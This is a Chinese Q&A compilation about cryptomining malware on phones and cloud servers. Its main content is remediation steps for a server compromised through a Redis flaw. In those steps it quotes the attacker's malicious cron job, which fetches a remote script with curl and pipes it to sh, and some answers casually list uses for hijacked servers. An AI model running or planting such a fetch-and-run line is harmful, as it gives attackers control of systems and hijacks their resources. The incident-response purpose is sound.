最近听说进入不良网站,黑客会拿我们的手机挖矿啥的,自动弹出的不良网站我点进去一秒就退了,被挖矿吗?
没有想的那么神奇。。现在的不良网站一般都是教人如何赌博。。如何打架什么的。通常会有赌博网站的连接在里面。。诱惑你去赌博的。。没有什么挖矿什么的。。退出去以后。重启下手机。。基本就正常了。。
阿里云服务器被挖矿了怎么办?(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
 View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
服务器被下挖矿了怎么办
哥们被下了啥挖矿?去举报啊。之前流量矿石非常火的时候,我的服务器也被无良黑了,成了肉鸡,然后我去找到他的信息,截图跟流量矿石举报,就帮我处理了。你看你的被下了啥,就去找他们处理。
请问一下,黑客,渗透提权或者爆破到的服务器有什么用处,可以卖吗?
服务器用来挂 ,挖矿赚钱、挂电脑管家、因为是24小时不间断的开着。服务器可以用来搭建网站做VPN,抓鸡、功能很多可以自己开发。
为什么黑客们要广设服务器,用别人的手机设备去挖矿?
可能是因为用自己的手机设备去挖矿不安全,如果犯法的话也可能被之一时间找到,用别人的手机设备就可以安全的多,到时候找也找不到自己
如何通过云计算服务器实现比特币挖矿
各公有云厂商都明确要求不允许使用云服务器进行挖矿,否则会被封禁的;
挖矿主要使用的是GPU,目前各公有云厂商提供的GPU服务器都比较贵的,从性价比上来说不划算,还不如用专用芯片;
当然,有黑客通过漏洞入侵服务器,在上面植入挖矿程序和脚本,进行挖矿操作,但这个本身是不合法的行为。